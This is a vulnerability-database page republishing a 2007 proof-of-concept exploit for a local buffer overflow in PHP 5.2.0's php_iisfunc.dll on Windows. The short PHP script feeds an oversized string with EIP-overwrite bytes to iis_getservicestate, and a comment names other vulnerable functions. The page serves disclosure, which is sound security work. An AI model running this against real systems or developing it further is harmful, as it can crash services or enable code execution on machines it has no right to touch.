Lucene search

K

PHP <= 5.2.0 (php_iisfunc.dll) Local Buffer Overflow PoC (win32)

πŸ—“οΈΒ 27 Aug 2007Β 00:00:00Reported byΒ boeckeTypeΒ 
zdt
Β zdt
πŸ”—Β 0day.todayπŸ‘Β 13Β Views

php_iisfunc.dll Buffer Overflow PoC PHP 5.2.0 (win32

Show more
Code
================================================================
PHP <= 5.2.0 (php_iisfunc.dll) Local Buffer Overflow PoC (win32)
================================================================




<?php
// ==================================================================================
//
//  php_iisfunc.dll PHP <= 5.2.0 (win32) Buffer Overflow PoC
//
//      Discovery: boecke <[emailΒ protected]>
//      Risk: Local Buffer Overflow (Medium - High Risk)
//      Notes: Various other functions are exploitable, all of which convert the
//      string argument(s) to unicode.
//
//      extern "C" IISFUNC_API int fnStartService(LPCTSTR ServiceId);
//      extern "C" IISFUNC_API int fnGetServiceState(LPCTSTR ServiceId);
//      extern "C" IISFUNC_API int fnStopService(LPCTSTR ServiceId);
//
//      "Sangre, sonando, de rabia naci.. Who do you trust?"
//       - Cygnus, Vismund Cygnus: Sarcophagi
//
// ==================================================================================

if ( !extension_loaded( "iisfunc" ) )
{
       die( "Extension not loaded.\n" );
}

$buf_unicode = str_repeat( "A", 256 );
$eip_unicode = "\x41\x41";

iis_getservicestate( $buf_unicode . $eip_unicode );

?>



#  0day.today [2018-04-08]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo